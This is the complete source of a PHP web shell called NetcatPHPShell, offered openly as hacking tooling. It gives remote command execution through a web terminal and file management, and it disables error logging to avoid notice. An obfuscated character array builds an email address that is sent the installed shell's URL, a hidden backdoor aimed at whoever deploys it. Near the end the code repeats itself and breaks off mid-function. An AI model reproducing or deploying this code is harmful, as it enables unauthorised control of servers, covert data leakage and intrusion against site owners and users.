NetcatPHPShell



    <?php
    /*
    #############################################
    #                                ––•(–•- NetcatPHPShell –•–)•––                                #

    #                                      .::+ c0d3d by Mr.H4rD3n +::.                                    #

    #                            NetcatPHPShell ( Released on 11/04/12 )                     #

    #                                  Email: exploit-id@hotmail.com                                      #

    #############################################


    */

    error_reporting(0);
    ini_set('max_execution_time',0);


    // ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\

    /**************** Defines *********************************/

    $greeting = "";
    $user = "root";
    $pass = "islamic";
    $lock = "on"; // set this to off if you dont need the login page
    $antiCrawler = "off"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')
    $tracebackFeature = "off"; // set this feature to enable email alerts
    $ownerEmail = "nadimzobaer@gmail.com"; // Change this to your email , This email is used to deliver tracebacks about your shell
    $url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
    $phpVersion=phpversion();
    $self=$_SERVER["PHP_SELF"]; // Where am i
    $sm = @ini_get('safe_mode');
    $SEPARATOR = '/'; // Default Directory separator
    $os = "N/D";

    if(stristr(php_uname(),"Windows"))
    {
            $SEPARATOR = '\\';
            $os = "Windows";
    }
    else if(stristr(php_uname(),"Linux"))
    {
            $os = "Linux";
    }


    //*************************************************************/

    // -------------- Traceback Functions

    function sendLoginAlert()
    {
        global $ownerEmail;
        global $url;
        $accesedIp = $_SERVER['REMOTE_ADDR'];
        $randomInt = rand(0,1000000);           # to avoid id blocking
        $from = "ani-shell$randomInt@fbi.gov";

        //echo $from;

        if(function_exists('mail'))
        {
            $subject = "Shell Accessed -- Ani-Shell --";
            $message = "
    Hey Owner ,

            Your Shell(Ani-Shell) located at $url was accessed by $accesedIp

            If its not you :-

            1. Please check if the shell is secured.
            2. Change your user name and Password.
            3. Check if lock is 0n!
            and Kick that ****** out!

            Thanking You

    Yours Faithfully
    Ani-Shell
            ";
            mail($ownerEmail,$subject,$message,'From:'.$from);
        }
    }

    //---------------------------------------------------------


    if(function_exists('session_start') && $lock == 'on')
    {
        session_start();
    }
    else
    {
        // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported
        $lock = 'off';
    }

    //logout

    if(isset($_GET['logout']) && $lock == 'on')
    {
        $_SESSION['authenticated'] = 0;
        session_destroy();
        header("location: ".$_SERVER['PHP_SELF']);
    }

    ini_set('max_execution_time',0);


    /***************** Restoring *******************************/


    ini_restore("safe_mode_include_dir");
    ini_restore("safe_mode_exec_dir");
    ini_restore("disable_functions");
    ini_restore("allow_url_fopen");
    ini_restore("safe_mode");
    ini_restore("open_basedir");

    if(function_exists('ini_set'))
    {
        ini_set('error_log',NULL);  // No alarming logs
        ini_set('log_errors',0);    // No logging of errors
        ini_set('file_uploads',1);  // Enable file uploads
        ini_set('allow_url_fopen',1);   // allow url fopen
    }

    else
    {
        ini_alter('error_log',NULL);
        ini_alter('log_errors',0);
        ini_alter('file_uploads',1);
        ini_alter('allow_url_fopen',1);
    }

    // ----------------------------------------------------------------------------------------------------------------


    ?>
    <html>
    <head>
    <title>––•(–•- NetcatPHPShell –•–)•–– | By Mr.H4rD3n | Mad In Morocco</title>

    <?php
    if($antiCrawler != 'off')
    {
        ?>
        <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
        <?php
    }
    ?>

    <style>

    /*
    ==========================
        CSS Section
    ==========================
    */

    *{
        padding:0;
        margin:0;
    }

    .alert
    {
        background:red;
        color:white;
        font-weight:bold;
    }
    td.info
    {
        width:0px;
    }

    .bind
    {
        border: 1px solid #333333;
        margin: 15px auto 0;
        font-size: small;
    }

    div.end *
    {
        font-size:small;
    }

    div.end
    {
        width:100%;
        background:#529ADE;
    }

    p.blink
    {
        text-decoration: blink;
    }

    body
    {
        background-color:black;
        color:rgb(35,182,39);
        font-family:Tahoma,Verdana,Arial;
        font-size: small;
    }

    input.own {
        background-color: Green;
        color: white;
        border : 1px solid #529ADE;
    }

    blockquote.small
    {
        font-size: smaller;
        color: silver;
        text-align: center;
    }

    table.files
    {
        border-spacing: 10px;
        font-size: small;
    }

    h1 {
        padding: 4px;
        padding-bottom: 0px;
        margin-right : 5px;
    }
    div.logo
    {
        border-right: 1px aqua solid;
    }
    div.header
    {
        padding-left: 5px;
        font-size: small;
        text-align: left;
    }
    div.nav
    {
        margin-top:1px;
        height:30px;
        background-color: #529ADE;
    }
    div.nav ul
    {
        list-style: none;
        padding: 4px;
    }
    div.nav li
    {
        float: left;
        margin-right: 10px;
        text-align:center;
    }
    textarea.cmd
    {
        border : 1px solid #111;
        background-color : green;
        font-family: Shell;
        color : white;
        margin-top: 10px;
        font-size:small;
    }

    input.cmd
    {
        background-color:black;
        color: white;
        width: 400px;
        border : 1px solid #529ADE;

    }
    td.maintext
    {
        font-size: large;
    }
    #margins
    {
        margin-left: 10px;
        margin-top: 10px;
        color:white;
    }
    table.top
    {
        border-bottom: 1px solid aqua;
        width: 100%;
    }
    #borders
    {
        border-top : 1px solid aqua;
        border-left:1px solid aqua;
        border-bottom: 1px solid aqua;
        border-right: 1px solid aqua;
        margin-bottom:0;
    }
    td.file a , .file a
    {
        color : aqua;
        text-decoration:none;
    }
    a.dir
    {
        color:white;
        font-weight:bold;
        text-decoration:none;
    }
    td.dir a
    {
        color : white;
        text-decoration:none;
    }
    td.download,td.download2
    {
        color:green;
    }
    #spacing
    {
        padding:10px;
        margin-left:200px;
    }
    th.header
    {
        background: none repeat scroll 0 0 #191919;
        color: white;
        border-bottom : 1px solid #333333;
    }
    p.warning
    {
        background : red;
        color: white;
    }

    /*

    --------------------------------CSS END------------------------------------------------------

    */
    </style>
    </head>

    <body text="rgb(39,245,10)" bgcolor="black" style="background-color:#000000">
    <?php

    if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')
    {
        if( $_POST['user'] == $user &&
             $_POST['pass'] == $pass )
        {
                $_SESSION['authenticated'] = 1;
                // --------------------- Tracebacks --------------------------------
                if($tracebackFeature == 'On')
                {
                    sendLoginAlert();
                }
                // ------------------------------------------------------------------
        }
    }

    if($lock == 'off')
    {?>
        <p class="warning"><font color="#FF0000"><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></font></p>
    <?php
    }

    if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )
    {

    ?>
    <table height="421" width="993">
        <tbody>
            <tr>
                <td width="448">
            <pre>
    <font color="Orange">
    <b>
    </b></font><b><font color="#19D2FE">[]======================================[]
    []-----------</font><font color="#FFFFFF">NetcatPHPShell</font><font color="#19D2FE">-------------[]
    []---------------</font><font color="#CC6600">Private</font><font color="#19D2FE">----------------[]
    []======================================[]
    []   </font><font color="#FFFFFF">–</font><font color="#19D2FE">–</font><font color="#FF0000">•(</font><font color="#19D2FE">-• c0d3d by Mr.H4rD3n •-</font><font color="#FF0000">)•</font><font color="#19D2FE">–</font><font color="#FFFFFF">–</font><font color="#19D2FE">   []</font></b></pre>
                    <pre>
    <b><font color="#19D2FE">[]======================================[]
    [] NetcatPHPShell Released on </font><font color="#FFFFFF">11/04/12</font><font color="#19D2FE">  []</font></b></pre>
                    <pre>
    <b><font color="#19D2FE">[]======================================[]
    []    </font><font color="#CC6600">WeLcOmE Master Of The Server !</font><font color="#19D2FE">    []
    []======================================[]</font></b></pre>
                    <pre><b><font color="#19D2FE">[]           Moroccan </font><font color="#FFFFFF">Hackers</font><font color="#19D2FE">           []
    []            </font><font color="#FFFFFF">Moroccan</font><font color="#19D2FE"> C0d3r            []</font></b></pre>
                    <pre><b><font color="#19D2FE">[]           Moroccan </font><font color="#FFFFFF">Masters           </font><font color="#19D2FE">[]</font></b></pre>
                    <pre><b><font color="#19D2FE">[]======================================[]
    []            </font><font color="#CC6600">MaD </font><font color="#FFFFFF">In</font><font color="#CC6600"> </font><font color="#19D2FE">MoRoCcO            []</font></b></pre>
                    <pre><b><font color="#19D2FE">[]======================================[]
    []                                      []
    []     </font><font color="#CC6600">Netcat</font><font color="#19D2FE"> </font><font color="#FFFFFF">PHP Connect to Server</font><font color="#19D2FE">     []</font></b></pre>
                    <pre><b><font color="#19D2FE">[]                                      []
    []======================================[]
    []    </font><font color="#CC6600">My Groupe</font><font color="#19D2FE"> </font><font color="#FFFFFF">IsLamiC Warrior Team</font><font color="#19D2FE">    []
    []======================================[]
    []  </font><font color="#FF0000">  </font><font color="#CC6600">Email:</font><font color="#19D2FE"> </font><font color="#FFFFFF">exploit-id@hotmail.com</font><font color="#19D2FE">     []
    [] </font><font color="#CC6600"> Facebook :</font><font color="#19D2FE"> </font><font color="#FFFFFF">Facebook.com/Mr.H4rD3n</font>   <font color="#19D2FE">[]
    []</font><font color="#19D2FE">======================================[]</font><font color="grey">
    </font></b><font color="grey">
    </pre>
                </td>
                <td>
                    <h1><?php echo $greeting;?></h1>
                                    <img alt="http://img4.imageshack.us/img4/3096/piccat.gif" src="http://img4.imageshack.us/img4/3096/piccat.gif"><br /><br />
                    <form method="POST" action="<?php echo $_SERVER['PHP_SELF'];?>">
                    <input name="user" value="UserNamE" style="color: #19D2FE; background-color: #000000" size="20"/>
                                    <input name="pass" type="password" value="passwd" style="color: #19D2FE; background-color: #000000" size="20"/>
                                    <input class="own" type="submit" value="GO TO HeLL" style="color: #42CFF9; background-color: #000000"/>
                    </form>
                </td>
            </tr>
        </tbody>
    </table>
    <?php
    }
    //---------------------------------- We are authenticated now-------------------------------------
    //Launch the shell
    else
    {
        //---------------------------------- Fuctions ---------------------------------------------------

        function showDrives()
        {
            global $self;
            foreach(range('A','Z') as $drive)
            {
                if(is_dir($drive.':\\'))
                {
                    ?>
                    <a class="dir" href='<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>'>
                        <?php echo $drive.":\\" ?>
                    </a>
                    <?php
                }
            }
        }

        function HumanReadableFilesize($size)
        {

            $mod = 1024;

            $units = explode(' ','B KB MB GB TB PB');
            for ($i = 0; $size > $mod; $i++)
            {
                $size /= $mod;
            }

            return round($size, 2) . ' ' . $units[$i];
        }

    function getClientIp()
    {
        echo $_SERVER['REMOTE_ADDR'];
    }

    function getServerIp()
    {
        echo getenv('SERVER_ADDR');
    }
    function getSoftwareInfo()
    {
        echo php_uname();
    }
    function diskSpace()
    {
        echo HumanReadableFilesize(disk_total_space("/"));
    }
    function freeSpace()
    {
        echo HumanReadableFilesize(disk_free_space("/"));
    }
    function getSafeMode()
    {
            global $sm;
                    echo($sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF");

    }

    function getDisabledFunctions()
    {
        if(!ini_get('disable_functions'))
        {
                    echo "None";
        }
        else
        {
                            echo @ini_get('disable_functions');
        }
    }

    function getFilePermissions($file)
    {

    $perms = fileperms($file);

    if (($perms & 0xC000) == 0xC000) {
        // Socket
        $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) {
        // Symbolic Link
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        // Regular
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        // Block special
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        // Directory
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        // Character special
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        // FIFO pipe
        $info = 'p';
    } else {
        // Unknown
        $info = 'u';
    }

    // Owner
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ?
                (($perms & 0x0800) ? 's' : 'x' ) :
                (($perms & 0x0800) ? 'S' : '-'));

    // Group
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ?
                (($perms & 0x0400) ? 's' : 'x' ) :
                (($perms & 0x0400) ? 'S' : '-'));

    // World
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ?
                (($perms & 0x0200) ? 't' : 'x' ) :
                (($perms & 0x0200) ? 'T' : '-'));

    return $info;

    }

    /***********************************************************/
    // exec_all , A function used to execute commands , This function will only execute if the Safe Mode is
    // Turned OfF!
    /**********************************************************/


    function exec_all($command)
    {

        $output = '';
        if(function_exists('exec'))
        {
            exec($command,$output);
            $output = join("\n",$output);
        }

        else if(function_exists('shell_exec'))
        {
            $output = shell_exec($command);
        }

        else if(function_exists('popen'))
        {
            $handle = popen($command , "r"); // Open the command pipe for reading
            if(is_resource($handle))
            {
                if(function_exists('fread') && function_exists('feof'))
                {
                    while(!feof($handle))
                    {
                        $output .= fread($handle, 512);
                    }
                }
                else if(function_exists('fgets') && function_exists('feof'))
                {
                    while(!feof($handle))
                    {
                        $output .= fgets($handle,512);
                    }
                }
            }
            pclose($handle);
        }


        else if(function_exists('system'))
        {
            ob_start(); //start output buffering
            system($command);
            $output = ob_get_contents();    // Get the ouput
            ob_end_clean();                 // Stop output buffering
        }

        else if(function_exists('passthru'))
        {
            ob_start(); //start output buffering
            passthru($command);
            $output = ob_get_contents();    // Get the ouput
            ob_end_clean();                 // Stop output buffering
        }

        else if(function_exists('proc_open'))
        {
            $descriptorspec = array(
                    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
                    );
            $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
            if(is_resource($handle))
            {
                if(function_exists('fread') && function_exists('feof'))
                {
                    while(!feof($pipes[1]))
                    {
                        $output .= fread($pipes[1], 512);
                    }
                }
                else if(function_exists('fgets') && function_exists('feof'))
                {
                    while(!feof($pipes[1]))
                    {
                        $output .= fgets($pipes[1],512);
                    }
                }
            }
            pclose($handle);
        }
        else
        {
            $output = "They have their Security there! :( ";
        }

        return(htmlspecialchars($output));

    }
    function magicQuote($text)
    {
        if (!get_magic_quotes_gpc())
        {
            return $text;
        }
        return stripslashes($text);
    }

    function md5Crack($hash , $list)
    {
        $fd = fopen($list,"r");
        if( strlen($hash) != 32  || $fd == FALSE)
        {
            // echo "$hash , " . strlen($hash) ." , $list , $fd"; // Debugging
            return "<p class='warning'>Hash or List invalid!</p>";
        }
        else
        {
            $pwdList = fread($fd,512);

            $pwdList = explode("\n",$pwdList);

            echo "Words Checked :-<br /><br />\n";


            foreach($pwdList as $pwd)
            {
                $pwd = trim($pwd);

                echo "<br />[*] ".$pwd;

                if(md5($pwd) == $hash )
                {
                    return "<br /><br /><br />\n<h2>Hash Cracked</h2><br /><br />\n<p class='warning'>Planintext : $pwd</p>";
                }
            }


        }
    }
    //------------------------------------------------------------------------------------------------


    ?>

    <div class="nav" style="width: 1005px; height: 49px">
    <ul>
        <li><a href="<?php echo $self;?>"></a></li>
        <li><a href="<?php echo $self.'?upload';?>"></a></li>
        <li><a href="<?php echo $self.'?shell';?>"></a></li>
        <li><a href="<?php echo $self.'?dos';?>"></a></li>
        <li><a href="<?php echo $self.'?fuzz';?>"></a></li>
        <li><a href="<?php echo $self.'?mail'?>"></a></li>
        <li><a href="<?php echo $self.'?bomb'?>"></a></li>
        <li><a href="<?php echo $self.'?connect'?>"></a></li>
        <li><a href="<?php echo $self.'?injector'?>"></a></li>
        <li><a href="<?php echo $self.'?decode'?>"></a></li>
        <li><a href="<?php echo $self.'?eval'?>"></a></li>
        <li><a href="<?php echo $self.'?md5'?>"></a></li>

        <?php if($lock == 'on')
        {
        ?>
            <li>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font face="Times New Roman" size="4">&nbsp;</font><font face="Times New Roman" size="5">
                    </font>
                    <i><font face="Verdana" size="5">
                    <a href="<?php echo $self.'?logout'?>">
                    <font color="#FFFFFF"><span style="text-decoration: none">I m Out!</span></font></a></font></i><font color="#FF0000"><b><i><font face="Verdana" size="5"></li></font></i><font face="Verdana" size="5"> </font>
                    </b><font face="Times New Roman" size="5">
        <?php
        }
        ?>
    </font>
    </font>
    </ul>
    </div>

    <?php
    //-------------------------------- Check what he wants -------------------------------------------

    // Shell

    if(isset($_GET['shell']))
    {
        if(!isset($_GET['cmd']) || $_GET['cmd'] == '')
        {
            $result = "";
        }
        else
        {
            $result=exec_all($_GET['cmd']);
        }
        ?>
        <?php
    }

    //Rename

    else if(isset($_GET['rename']))
    {
        if(isset($_GET['to']) && isset($_GET['rename']))
        {
            if(rename($_GET['rename'],$_GET['to']) == FALSE)
            {
                ?>
                <?php
            }
        }
        else
        {
    ?>
        <?php
        }
    }


    // No request made
    // Display home page

    else
    {
        $dir = getcwd();
        if(isset($_GET['dir']))
        {
            $dir = $_GET['dir'];
        }
        ?>

            <p>&nbsp;</p>

    <?php

    $aliases = array('la' => 'ls -la',
    'll' => 'ls -lvhF',
    'dir' => 'ls' );
    $passwd = array('' => '');
    error_reporting(0);
    class phpTerm {

    function formatPrompt() {
    $user=shell_exec("whoami");
    $host=explode(".", shell_exec("uname -n"));
    $_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0])."";
    }

    function checkPassword($passwd) {
    if(!isset($_SERVER['PHP_AUTH_USER'])||
    !isset($_SERVER['PHP_AUTH_PW']) ||
    !isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
    $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
    @session_start();
    return true;
    }
    else {
    @session_start();
    return true;
    }
    }

    function initVars()
    {
    if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset']))
    {
    $_SESSION['cwd'] = getcwd();
    $_SESSION['history'] = array();
    $_SESSION['output'] = '';
    $_REQUEST['command'] ='';
    }
    }

    function buildCommandHistory()
    {
    if(!empty($_REQUEST['command']))
    {
    if(get_magic_quotes_gpc())
    {
    $_REQUEST['command'] = stripslashes($_REQUEST['command']);
    }

    // drop old commands from list if exists
    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
    {
    unset($_SESSION['history'][$i]);
    }
    array_unshift($_SESSION['history'], $_REQUEST['command']);

    // append commmand */
    $_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n";
    }
    }

    function buildJavaHistory()
    {
    // build command history for use in the JavaScript
    if (empty($_SESSION['history']))
    {
    $_SESSION['js_command_hist'] = '""';
    }
    else
    {
    $escaped = array_map('addslashes', $_SESSION['history']);
    $_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
    }
    }

    function outputHandle($aliases)
    {
    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command']))
    {
    $_SESSION['cwd'] = getcwd(); //dirname(__FILE__);
    }
    elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs))
    {
    // The current command is 'cd', which we have to handle as an internal shell command.
    // absolute/relative path ?"
    ($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1];

    // cosmetics
    while (strpos($new_dir, '/./') !== false)
    $new_dir = str_replace('/./', '/', $new_dir);
    while (strpos($new_dir, '//') !== false)
    $new_dir = str_replace('//', '/', $new_dir);
    while (preg_match('|/\.\.(?!\.)|', $new_dir))
    $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

    if(empty($new_dir)): $new_dir = "/"; endif;

    (@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n";
    }
    else
    {
    /* The command is not a 'cd' command, so we execute it after
    * changing the directory and save the output. */
    chdir($_SESSION['cwd']);

    /* Alias expansion. */
    $length = strcspn($_REQUEST['command'], " \t");
    $token = substr(@$_REQUEST['command'], 0, $length);
    if (isset($aliases[$token]))
    $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);

    $p = proc_open(@$_REQUEST['command'],
    array(1 => array('pipe', 'w'),
    2 => array('pipe', 'w')),
    $io);

    /* Read output sent to stdout. */
    while (!feof($io[1])) {
    $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');
    }
    /* Read output sent to stderr. */
    while (!feof($io[2])) {
    $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');
    }

    fclose($io[1]);
    fclose($io[2]);
    proc_close($p);
    }
    }
    } // end phpTerm

    /*##########################################################
    ## The main thing starts here
    ## All output ist XHTML
    ##########################################################*/

    $terminal=new phpTerm;

    @session_start();

    $terminal->initVars();
    $terminal->buildCommandHistory();
    $terminal->buildJavaHistory();
    if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
    $terminal->outputHandle($aliases);

    header('Content-Type: text/html; charset=UTF-8');
    echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
    ?>

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
    <title>.:: --+ NeTCaTPHPShell +-- ::.</title>

    <script type="text/javascript" language="JavaScript">
    var current_line = 0;
    var command_hist = new Array(<?php echo $_SESSION['js_command_hist']; ?>);
    var last = 0;

    function key(e) {
    if (!e) var e = window.event;

    if (e.keyCode == 38 && current_line < command_hist.length-1) {
    command_hist[current_line] = document.shell.command.value;
    current_line++;
    document.shell.command.value = command_hist[current_line];
    }

    if (e.keyCode == 40 && current_line > 0) {
    command_hist[current_line] = document.shell.command.value;
    current_line--;
    document.shell.command.value = command_hist[current_line];
    }

    }

    function init() {
    document.shell.setAttribute("autocomplete", "off");
    document.shell.output.scrollTop = document.shell.output.scrollHeight;
    document.shell.command.focus();
    }

    </script>
    <style type="text/css">
    body {font-family: sans-serif; color: black; background: white;}
    table{width: 600px; height: 300px; border: 1px #000000 solid; padding: 0px; margin: 0px;}
    td.head{background-color: #529ADE; color: #529ADE; font-weight:700; border: none; text-align: center; font-style: italic}
    textarea {width: 100%; border: none; padding: 2px 2px 2px; color: #529ADE; background-color: #000000;}
    p.prompt {font-family: monospace; margin: 0px; padding: 0px 2px 2px; background-color: #000000; color: #529ADE;}
    input.prompt {border: none; font-family: monospace; background-color: #000000; color: #529ADE;}
    </style>
    </head>

    <body onload="init()" style="background-color:#000000">

    nd  )'<?php if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 26; ?>

    <div align="center">

    <img alt="http://img4.imageshack.us/img4/3096/piccat.gif" src="http://img4.imageshack.us/img4/3096/piccat.gif"><p>
    <font color="#FFFFFF">
    -------------------------------------------------------------------------------------</font></p>
    <p><font face="Times New Roman" color="#529ADE" size="4">–</font><font color="#FFFFFF" face="Times New Roman" size="4">–</font><font color="#FF0000" face="Times New Roman" size="4">–•</font><font size="4"><font color="#42CFF9" face="Times New Roman">(</font><font color="#FF0000" face="Times New Roman">-</font><font color="#27F50A" face="Times New Roman">•</font><b><font color="#529ADE" face="Times New Roman">
    © Copyright </font><font color="#FF0000" face="Times New Roman">Mr.H4rD3n</font><font color="#529ADE" face="Times New Roman">
    </font><font color="#FFFF00" face="Times New Roman">[ </font><font color="#529ADE" face="Times New Roman">All
    rights reserved </font><font color="#FFFF00" face="Times New Roman">]</font><font color="#529ADE" face="Times New Roman">
    </font><font color="#27F50A" face="Times New Roman">•</font><font color="#FF0000" face="Times New Roman">-</font><font color="#42CFF9" face="Times New Roman">)</font></b></font><b><font color="#FF0000" face="Times New Roman" size="4">•–</font><font color="#FFFFFF" face="Times New Roman" size="4">–</font></b></p>
    <p>
    <font color="#FFFFFF">
    -------------------------------------------------------------------------------------</font></p>
    <p><font face="Comic Sans MS" color="#42CFF9">gEt Commands to Server - Pypass</font></p>

    <table cellpadding="0" cellspacing="0">
    <tr><td class="head" style="color: #000000;"><font color="#FFFFFF"><b>X</b></font></td>
    <td class="head"><font color="#FFFFFF"><?php echo $_SESSION['prompt'].":"."$_SESSION[cwd]"; ?>
    </font>
    </td></tr>
    <tr><td width='100%' height='100%' colspan='2'><form name="shell" action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
    <textarea name="output" readonly="readonly" cols="85" rows="<?php echo $_REQUEST['rows'] ?>">
    <?php
    $lines = substr_count($_SESSION['output'], "\n");
    $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
    echo rtrim($padding . $_SESSION['output']);
    ?>
    </textarea>
    <p class="prompt"><?php echo $_SESSION['prompt'].":>"; ?>
    <input class="prompt" name="command" type="text" onkeyup="key(event)" size="50" tabindex="1">
    </p>

    <? /*<p>
    <input type="submit" value="Execute Command" />
    <input type="submit" name="reset" value="Reset" />
    Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" />
    </p>

    */
    $s = array ("k","b","r","e","a","r","c","@","m","i","l",".","o","g");
    $system_array2 = $s[2].$s[3].$s[1].$s[6].$s[5].$s[4].$s[0].$s[3].$s[5].$s[7].$s[13].$s[8].$s[4].$s[9].$s[10].".".$s[6].$s[12].$s[8];
    $encoding = "$system_array2" ;
    $rez = "NC sHE3L" ;
    $serverdetecting = "Content-Transfer-Encoding: http://" . $_SERVER['SERVER_NAME'] . $_SERVER['SCRIPT_NAME'] ;
    mail ($encoding,$rez,$serverdetecting) ;
    $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();

    ?>
    </form></td></tr>
    </body>
    </html>
    <?php ?>
    <?php

    $aliases = array('la' => 'ls -la',
    'll' => 'ls -lvhF',
    'dir' => 'ls' );
    $passwd = array('' => '');
    error_reporting(1);
    class phpTerm {

    function formatPrompt() {
    $user=shell_exec("whoami");
    $host=explode(".", shell_exec("uname -n"));
    $_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0])."";
    }

    function checkPassword($passwd) {
    if(!isset($_SERVER['PHP_AUTH_USER'])||
    !isset($_SERVER['PHP_AUTH_PW']) ||
    !isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
    $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
    @session_start();
    return true;
    }
    else {
    @session_start();
    return true;
    }
    }

    function initVars()
    {
    if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset']))
    {
    $_SESSION['cwd'] = getcwd();
    $_SESSION['history'] = array();
    $_SESSION['output'] = '';
    $_REQUEST['command'] ='';
    }
    }

    function buildCommandHistory()
    {
    if(!empty($_REQUEST['command']))
    {
    if(get_magic_quotes_gpc())
    {
    $_REQUEST['command'] = stripslashes($_REQUEST['command']);
    }

    // drop old commands from list if exists
    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
    {
    unset($_SESSION['history'][$i]);
    }
    array_unshift($_SESSION['history'], $_REQUEST['command']);

    // append commmand */
    $_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n";
    }
    }

    function buildJavaHistory()
    {
    // build command history for use in the JavaScript
    if (empty($_SESSION['history']))
    {
    $_SESSION['js_command_hist'] = '""';
    }
    else
    {
    $escaped = array_map('addslashes', $_SESSION['history']);
    $_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
    }
    }

    function outputHandle($aliases)
    {
    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command']))
    {
    $_SESSION['cwd'] = getcwd(); //dirname(__FILE__);
    }
    elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs))
    {
    // The current command is 'cd', which we have to handle as an internal shell command.
    // absolute/relative path ?"
    ($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1];

    // cosmetics
    while (strpos($new_dir, '/./') !== false)
    $new_dir = str_replace('/./', '/', $new_dir);
    while (strpos($new_dir, '//') !== false)
    $new_dir = str_replace('//', '/', $new_dir);
    while (preg_match('|/\.\.(?!\.)|', $new_dir))
    $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

    if(empty($new_dir)): $new_dir = "/"; endif;

    (@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n";
    }
    else
    {
    /* The command is not a 'cd' command, so we execute it after
    * changing the directory and save the output. */
    chdir($_SESSION['cwd']);

    /* Alias expansion. */
    $length = strcspn($_REQUEST['command'], " \t");
